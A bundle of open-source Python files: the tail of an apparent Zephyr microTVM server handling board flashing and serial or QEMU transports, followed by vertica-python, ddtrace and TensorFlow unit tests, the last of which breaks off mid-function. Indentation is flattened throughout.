# The nRF5340DK requires an additional `nrfjprog --recover` before each flash cycle.
# This is because readback protection is enabled by default when this device is flashed.
# Otherwise, flashing may fail with an error such as the following:
# ERROR: The operation attempted is unavailable due to readback protection in
# ERROR: your device. Please use --recover to unlock the device.
if zephyr_board.startswith("nrf5340dk") and _get_flash_runner() == "nrfjprog":
recover_args = ["nrfjprog", "--recover"]
recover_args.extend(_get_nrf_device_args(options))
check_call(recover_args, cwd=API_SERVER_DIR / "build")
check_call(["make", "flash"], cwd=API_SERVER_DIR / "build")
def open_transport(self, options):
if self._is_qemu(options):
transport = ZephyrQemuTransport(options)
else:
transport = ZephyrSerialTransport(options)
to_return = transport.open()
self._transport = transport
atexit.register(lambda: self.close_transport())
return to_return
def close_transport(self):
if self._transport is not None:
self._transport.close()
self._transport = None
def read_transport(self, n, timeout_sec):
if self._transport is None:
raise server.TransportClosedError()
return self._transport.read(n, timeout_sec)
def write_transport(self, data, timeout_sec):
if self._transport is None:
raise server.TransportClosedError()
return self._transport.write(data, timeout_sec)
def _set_nonblock(fd):
flag = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flag | os.O_NONBLOCK)
new_flag = fcntl.fcntl(fd, fcntl.F_GETFL)
assert (new_flag & os.O_NONBLOCK) != 0, "Cannot set file descriptor {fd} to non-blocking"
class ZephyrSerialTransport:
NRF5340_VENDOR_ID = 0x1366
# NRF5340_DK v1.0.0 uses VCOM2
# NRF5340_DK v2.0.0 uses VCOM1
NRF5340_DK_BOARD_VCOM_BY_PRODUCT_ID = {0x1055: "VCOM2", 0x1051: "VCOM1"}
@classmethod
def _lookup_baud_rate(cls, options):
# TODO(mehrdadh): remove this hack once dtlib.py is a standalone project
# https://github.com/zephyrproject-rtos/zephyr/blob/v2.7-branch/scripts/dts/README.txt
sys.path.insert(
0,
os.path.join(
get_zephyr_base(options), "scripts", "dts", "python-devicetree", "src", "devicetree"
),
)
try:
import dtlib # pylint: disable=import-outside-toplevel
finally:
sys.path.pop(0)
dt_inst = dtlib.DT(BUILD_DIR / "zephyr" / "zephyr.dts")
uart_baud = (
dt_inst.get_node("/chosen")
.props["zephyr,console"]
.to_path()
.props["current-speed"]
.to_num()
)
_LOG.debug("zephyr transport: found UART baudrate from devicetree: %d", uart_baud)
return uart_baud
@classmethod
def _find_nrf_serial_port(cls, options):
com_ports = subprocess.check_output(
["nrfjprog", "--com"] + _get_device_args(options), encoding="utf-8"
)
ports_by_vcom = {}
for line in com_ports.split("\n")[:-1]:
parts = line.split()
ports_by_vcom[parts[2]] = parts[1]
nrf_board = usb.core.find(idVendor=cls.NRF5340_VENDOR_ID)
if nrf_board == None:
raise Exception("_find_nrf_serial_port: unable to find NRF5340DK")
if nrf_board.idProduct in cls.NRF5340_DK_BOARD_VCOM_BY_PRODUCT_ID:
vcom_port = cls.NRF5340_DK_BOARD_VCOM_BY_PRODUCT_ID[nrf_board.idProduct]
else:
raise Exception("_find_nrf_serial_port: unable to find known NRF5340DK product ID")
return ports_by_vcom[vcom_port]
@classmethod
def _find_openocd_serial_port(cls, options):
serial_number = options.get("openocd_serial")
return generic_find_serial_port(serial_number)
@classmethod
def _find_jlink_serial_port(cls, options):
return generic_find_serial_port()
@classmethod
def _find_serial_port(cls, options):
flash_runner = _get_flash_runner()
if flash_runner == "nrfjprog":
return cls._find_nrf_serial_port(options)
if flash_runner == "openocd":
return cls._find_openocd_serial_port(options)
if flash_runner == "jlink":
return cls._find_jlink_serial_port(options)
raise RuntimeError(f"Don't know how to deduce serial port for flash runner {flash_runner}")
def __init__(self, options):
self._options = options
self._port = None
def open(self):
port_path = self._find_serial_port(self._options)
self._port = serial.Serial(port_path, baudrate=self._lookup_baud_rate(self._options))
return server.TransportTimeouts(
session_start_retry_timeout_sec=2.0,
session_start_timeout_sec=5.0,
session_established_timeout_sec=5.0,
)
def close(self):
self._port.close()
self._port = None
def read(self, n, timeout_sec):
self._port.timeout = timeout_sec
to_return = self._port.read(n)
if not to_return:
raise server.IoTimeoutError()
return to_return
def write(self, data, timeout_sec):
self._port.write_timeout = timeout_sec
bytes_written = 0
while bytes_written < len(data):
n = self._port.write(data)
data = data[n:]
bytes_written += n
class ZephyrQemuMakeResult(enum.Enum):
QEMU_STARTED = "qemu_started"
MAKE_FAILED = "make_failed"
EOF = "eof"
class ZephyrQemuTransport:
"""The user-facing Zephyr QEMU transport class."""
def __init__(self, options):
self.options = options
self.proc = None
self.pipe_dir = None
self.read_fd = None
self.write_fd = None
self._queue = queue.Queue()
def open(self):
self.pipe_dir = pathlib.Path(tempfile.mkdtemp())
self.pipe = self.pipe_dir / "fifo"
self.write_pipe = self.pipe_dir / "fifo.in"
self.read_pipe = self.pipe_dir / "fifo.out"
os.mkfifo(self.write_pipe)
os.mkfifo(self.read_pipe)
if "gdbserver_port" in self.options:
if "env" in self.kwargs:
self.kwargs["env"] = copy.copy(self.kwargs["env"])
else:
self.kwargs["env"] = os.environ.copy()
self.kwargs["env"]["TVM_QEMU_GDBSERVER_PORT"] = str(self.options["gdbserver_port"])
self.proc = subprocess.Popen(
["make", "run", f"QEMU_PIPE={self.pipe}"],
cwd=BUILD_DIR,
stdout=subprocess.PIPE,
)
self._wait_for_qemu()
# NOTE: although each pipe is unidirectional, open both as RDWR to work around a select
# limitation on linux. Without this, non-blocking I/O can't use timeouts because named
# FIFO are always considered ready to read when no one has opened them for writing.
self.read_fd = os.open(self.read_pipe, os.O_RDWR | os.O_NONBLOCK)
self.write_fd = os.open(self.write_pipe, os.O_RDWR | os.O_NONBLOCK)
_set_nonblock(self.read_fd)
_set_nonblock(self.write_fd)
return server.TransportTimeouts(
session_start_retry_timeout_sec=2.0,
session_start_timeout_sec=10.0,
session_established_timeout_sec=10.0,
)
def close(self):
did_write = False
if self.write_fd is not None:
try:
server.write_with_timeout(
self.write_fd, b"\x01x", 1.0
) # Use a short timeout since we will kill the process
did_write = True
except server.IoTimeoutError:
pass
os.close(self.write_fd)
self.write_fd = None
if self.proc:
if not did_write:
self.proc.terminate()
try:
self.proc.wait(5.0)
except subprocess.TimeoutExpired:
self.proc.kill()
if self.read_fd:
os.close(self.read_fd)
self.read_fd = None
if self.pipe_dir is not None:
shutil.rmtree(self.pipe_dir)
self.pipe_dir = None
def read(self, n, timeout_sec):
return server.read_with_timeout(self.read_fd, n, timeout_sec)
def write(self, data, timeout_sec):
to_write = bytearray()
escape_pos = []
for i, b in enumerate(data):
if b == 0x01:
to_write.append(b)
escape_pos.append(i)
to_write.append(b)
while to_write:
num_written = server.write_with_timeout(self.write_fd, to_write, timeout_sec)
to_write = to_write[num_written:]
def _qemu_check_stdout(self):
for line in self.proc.stdout:
line = str(line)
_LOG.info("%s", line)
if "[QEMU] CPU" in line:
self._queue.put(ZephyrQemuMakeResult.QEMU_STARTED)
else:
line = re.sub("[^a-zA-Z0-9 \n]", "", line)
pattern = r"recipe for target (\w*) failed"
if re.search(pattern, line, re.IGNORECASE):
self._queue.put(ZephyrQemuMakeResult.MAKE_FAILED)
self._queue.put(ZephyrQemuMakeResult.EOF)
def _wait_for_qemu(self):
threading.Thread(target=self._qemu_check_stdout, daemon=True).start()
while True:
try:
item = self._queue.get(timeout=120)
except Exception:
raise TimeoutError("QEMU setup timeout.")
if item == ZephyrQemuMakeResult.QEMU_STARTED:
break
if item in [ZephyrQemuMakeResult.MAKE_FAILED, ZephyrQemuMakeResult.EOF]:
raise RuntimeError("QEMU setup failed.")
raise ValueError(f"{item} not expected.")
if __name__ == "__main__":
server.main(Handler())
|
test_cancel.py
|
# Copyright (c) 2019-2020 Micro Focus or one of its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division, absolute_import
from multiprocessing import Process
import pytest
import time
from .base import VerticaPythonIntegrationTestCase
from ... import errors
class CancelTestCase(VerticaPythonIntegrationTestCase):
def test_cursor_cancel(self):
# Cursor.cancel() should be not supported any more
with self._connect() as conn:
cursor = conn.cursor()
with self.assertRaises(errors.NotSupportedError):
cursor.cancel()
def test_connection_cancel_no_query(self):
with self._connect() as conn:
cur = conn.cursor()
# No query is being executed, cancel does nothing
conn.cancel()
@pytest.mark.timeout(30)
def test_connection_cancel_running_query(self):
def cancel_query(conn, delay=5):
time.sleep(delay)
conn.cancel()
with self._connect() as conn:
cur = conn.cursor()
p1 = Process(target=cancel_query, args=(conn,))
p1.start()
with self.assertRaises(errors.QueryCanceled):
long_running_query = ('select count(*) from '
'(select node_name from CONFIGURATION_PARAMETERS) as a cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as b cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as c')
cur.execute(long_running_query)
p1.join()
exec(CancelTestCase.createPrepStmtClass())
|
test_context.py
|
import contextlib
import mock
import threading
from unittest import TestCase
from nose.tools import eq_, ok_
from tests.test_tracer import get_dummy_tracer
from ddtrace.span import Span
from ddtrace.context import Context, ThreadLocalContext
from ddtrace.ext.priority import USER_REJECT, AUTO_REJECT, AUTO_KEEP, USER_KEEP
class TestTracingContext(TestCase):
"""
Tests related to the ``Context`` class that hosts the trace for the
current execution flow.
"""
@contextlib.contextmanager
def override_partial_flush(self, ctx, enabled, min_spans):
original_enabled = ctx._partial_flush_enabled
original_min_spans = ctx._partial_flush_min_spans
ctx._partial_flush_enabled = enabled
ctx._partial_flush_min_spans = min_spans
try:
yield
finally:
ctx._partial_flush_enabled = original_enabled
ctx._partial_flush_min_spans = original_min_spans
def test_add_span(self):
# it should add multiple spans
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(1, len(ctx._trace))
eq_('fake_span', ctx._trace[0].name)
eq_(ctx, span.context)
def test_context_sampled(self):
# a context is sampled if the spans are sampled
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ok_(ctx._sampled is True)
ok_(ctx.sampling_priority is None)
def test_context_priority(self):
# a context is sampled if the spans are sampled
ctx = Context()
for priority in [USER_REJECT, AUTO_REJECT, AUTO_KEEP, USER_KEEP, None, 999]:
ctx.sampling_priority = priority
span = Span(tracer=None, name=('fake_span_%s' % repr(priority)))
ctx.add_span(span)
# It's "normal" to have sampled be true even when priority sampling is
# set to 0 or -1. It would stay false even even with priority set to 2.
# The only criteria to send (or not) the spans to the agent should be
# this "sampled" attribute, as it's tightly related to the trace weight.
ok_(ctx._sampled is True, 'priority has no impact on sampled status')
eq_(priority, ctx.sampling_priority)
def test_current_span(self):
# it should return the current active span
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(span, ctx.get_current_span())
def test_current_root_span_none(self):
# it should return none when there is no root span
ctx = Context()
eq_(None, ctx.get_current_root_span())
def test_current_root_span(self):
# it should return the current active root span
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(span, ctx.get_current_root_span())
def test_close_span(self):
# it should keep track of closed spans, moving
# the current active to it's parent
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
eq_(1, ctx._finished_spans)
ok_(ctx.get_current_span() is None)
def test_get_trace(self):
# it should return the internal trace structure
# if the context is finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
trace, sampled = ctx.get()
eq_(1, len(trace))
eq_(span, trace[0])
ok_(sampled is True)
# the context should be empty
eq_(0, len(ctx._trace))
eq_(0, ctx._finished_spans)
ok_(ctx._current_span is None)
ok_(ctx._sampled is True)
def test_get_trace_empty(self):
# it should return None if the Context is not finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
trace, sampled = ctx.get()
ok_(trace is None)
ok_(sampled is None)
def test_partial_flush(self):
"""
When calling `Context.get`
When partial flushing is enabled
When we have just enough finished spans to flush
We return the finished spans
"""
tracer = get_dummy_tracer()
ctx = Context()
# Create a root span with 5 children, all of the children are finished, the root is not
root = Span(tracer=tracer, name='root')
ctx.add_span(root)
for i in range(5):
child = Span(tracer=tracer, name='child_{}'.format(i), trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
child._finished = True
ctx.add_span(child)
ctx.close_span(child)
with self.override_partial_flush(ctx, enabled=True, min_spans=5):
trace, sampled = ctx.get()
self.assertIsNotNone(trace)
self.assertIsNotNone(sampled)
self.assertEqual(len(trace), 5)
self.assertEqual(
set(['child_0', 'child_1', 'child_2', 'child_3', 'child_4']),
set([span.name for span in trace])
)
# Ensure we clear/reset internal stats as expected
self.assertEqual(ctx._finished_spans, 0)
self.assertEqual(ctx._trace, [root])
with self.override_partial_flush(ctx, enabled=True, min_spans=5):
trace, sampled = ctx.get()
self.assertIsNone(trace)
self.assertIsNone(sampled)
def test_partial_flush_too_many(self):
"""
When calling `Context.get`
When partial flushing is enabled
When we have more than the minimum number of spans needed to flush
We return the finished spans
"""
tracer = get_dummy_tracer()
ctx = Context()
# Create a root span with 5 children, all of the children are finished, the root is not
root = Span(tracer=tracer, name='root')
ctx.add_span(root)
for i in range(5):
child = Span(tracer=tracer, name='child_{}'.format(i), trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
child._finished = True
ctx.add_span(child)
ctx.close_span(child)
with self.override_partial_flush(ctx, enabled=True, min_spans=1):
trace, sampled = ctx.get()
self.assertIsNotNone(trace)
self.assertIsNotNone(sampled)
self.assertEqual(len(trace), 5)
self.assertEqual(
set(['child_0', 'child_1', 'child_2', 'child_3', 'child_4']),
set([span.name for span in trace])
)
# Ensure we clear/reset internal stats as expected
self.assertEqual(ctx._finished_spans, 0)
self.assertEqual(ctx._trace, [root])
with self.override_partial_flush(ctx, enabled=True, min_spans=5):
trace, sampled = ctx.get()
self.assertIsNone(trace)
self.assertIsNone(sampled)
def test_partial_flush_too_few(self):
"""
When calling `Context.get`
When partial flushing is enabled
When we do not have enough finished spans to flush
We return no spans
"""
tracer = get_dummy_tracer()
ctx = Context()
# Create a root span with 5 children, all of the children are finished, the root is not
root = Span(tracer=tracer, name='root')
ctx.add_span(root)
for i in range(5):
child = Span(tracer=tracer, name='child_{}'.format(i), trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
child._finished = True
ctx.add_span(child)
ctx.close_span(child)
# Test with having 1 too few spans for partial flush
with self.override_partial_flush(ctx, enabled=True, min_spans=6):
trace, sampled = ctx.get()
self.assertIsNone(trace)
self.assertIsNone(sampled)
self.assertEqual(len(ctx._trace), 6)
self.assertEqual(ctx._finished_spans, 5)
self.assertEqual(
set(['root', 'child_0', 'child_1', 'child_2', 'child_3', 'child_4']),
set([span.name for span in ctx._trace])
)
def test_partial_flush_remaining(self):
"""
When calling `Context.get`
When partial flushing is enabled
When we have some unfinished spans
We keep the unfinished spans around
"""
tracer = get_dummy_tracer()
ctx = Context()
# Create a root span with 5 children, all of the children are finished, the root is not
root = Span(tracer=tracer, name='root')
ctx.add_span(root)
for i in range(10):
child = Span(tracer=tracer, name='child_{}'.format(i), trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(child)
# CLose the first 5 only
if i < 5:
child._finished = True
ctx.close_span(child)
with self.override_partial_flush(ctx, enabled=True, min_spans=5):
trace, sampled = ctx.get()
# Assert partially flushed spans
self.assertTrue(len(trace), 5)
self.assertIsNotNone(sampled)
self.assertEqual(
set(['child_0', 'child_1', 'child_2', 'child_3', 'child_4']),
set([span.name for span in trace])
)
# Assert remaining unclosed spans
self.assertEqual(len(ctx._trace), 6)
self.assertEqual(ctx._finished_spans, 0)
self.assertEqual(
set(['root', 'child_5', 'child_6', 'child_7', 'child_8', 'child_9']),
set([span.name for span in ctx._trace]),
)
def test_finished(self):
# a Context is finished if all spans inside are finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
ok_(ctx.is_finished())
def test_finished_empty(self):
# a Context is not finished if it's empty
ctx = Context()
ok_(ctx.is_finished() is False)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans(self, log):
# when the root parent is finished, notify if there are spans still pending
tracer = get_dummy_tracer()
tracer.debug_logging = True
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child_1 = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child_2 = Span(tracer=tracer, name='child_2', trace_id=root.trace_id, parent_id=root.span_id)
child_1._parent = root
child_2._parent = root
ctx.add_span(root)
ctx.add_span(child_1)
ctx.add_span(child_2)
# close only the parent
root.finish()
ok_(ctx.is_finished() is False)
unfinished_spans_log = log.call_args_list[-3][0][2]
child_1_log = log.call_args_list[-2][0][1]
child_2_log = log.call_args_list[-1][0][1]
eq_(2, unfinished_spans_log)
ok_('name child_1' in child_1_log)
ok_('name child_2' in child_2_log)
ok_('duration 0.000000s' in child_1_log)
ok_('duration 0.000000s' in child_2_log)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans_disabled(self, log):
# the trace finished status logging is disabled
tracer = get_dummy_tracer()
tracer.debug_logging = False
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child_1 = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child_2 = Span(tracer=tracer, name='child_2', trace_id=root.trace_id, parent_id=root.span_id)
child_1._parent = root
child_2._parent = root
ctx.add_span(root)
ctx.add_span(child_1)
ctx.add_span(child_2)
# close only the parent
root.finish()
ok_(ctx.is_finished() is False)
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
ok_('the trace has %d unfinished spans' not in msg)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans_when_ok(self, log):
# if the unfinished spans logging is enabled but the trace is finished, don't log anything
tracer = get_dummy_tracer()
tracer.debug_logging = True
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
# close the trace
child.finish()
root.finish()
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
ok_('the trace has %d unfinished spans' not in msg)
def test_thread_safe(self):
# the Context must be thread-safe
ctx = Context()
def _fill_ctx():
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
threads = [threading.Thread(target=_fill_ctx) for _ in range(100)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
eq_(100, len(ctx._trace))
def test_clone(self):
ctx = Context()
ctx.sampling_priority = 2
# manually create a root-child trace
root = Span(tracer=None, name='root')
child = Span(tracer=None, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
cloned_ctx = ctx.clone()
eq_(cloned_ctx._parent_trace_id, ctx._parent_trace_id)
eq_(cloned_ctx._parent_span_id, ctx._parent_span_id)
eq_(cloned_ctx._sampled, ctx._sampled)
eq_(cloned_ctx._sampling_priority, ctx._sampling_priority)
eq_(cloned_ctx._current_span, ctx._current_span)
eq_(cloned_ctx._trace, [])
eq_(cloned_ctx._finished_spans, 0)
class TestThreadContext(TestCase):
"""
Ensures that a ``ThreadLocalContext`` makes the Context
local to each thread.
"""
def test_get_or_create(self):
# asking the Context multiple times should return
# always the same instance
l_ctx = ThreadLocalContext()
eq_(l_ctx.get(), l_ctx.get())
def test_set_context(self):
# the Context can be set in the current Thread
ctx = Context()
local = ThreadLocalContext()
ok_(local.get() is not ctx)
local.set(ctx)
ok_(local.get() is ctx)
def test_multiple_threads_multiple_context(self):
# each thread should have it's own Context
l_ctx = ThreadLocalContext()
def _fill_ctx():
ctx = l_ctx.get()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(1, len(ctx._trace))
threads = [threading.Thread(target=_fill_ctx) for _ in range(100)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
# the main instance should have an empty Context
# because it has not been used in this thread
ctx = l_ctx.get()
eq_(0, len(ctx._trace))
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import threading
import time
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_parallel_calls,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components)
.map(_map_fn, num_parallel_calls=num_parallel_calls)
.prefetch(output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_parallel_calls = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(
components, count, num_parallel_calls, output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_parallel_calls_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_parallel_calls: num_parallel_calls_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_parallel_calls: num_parallel_calls_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_parallel_calls_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_parallel_calls_val, output_buffer_size_val)
def testImplicitDisposeParallelMapDataset(self):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: (queue.dequeue(), queue_2.dequeue()))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for i in range(100):
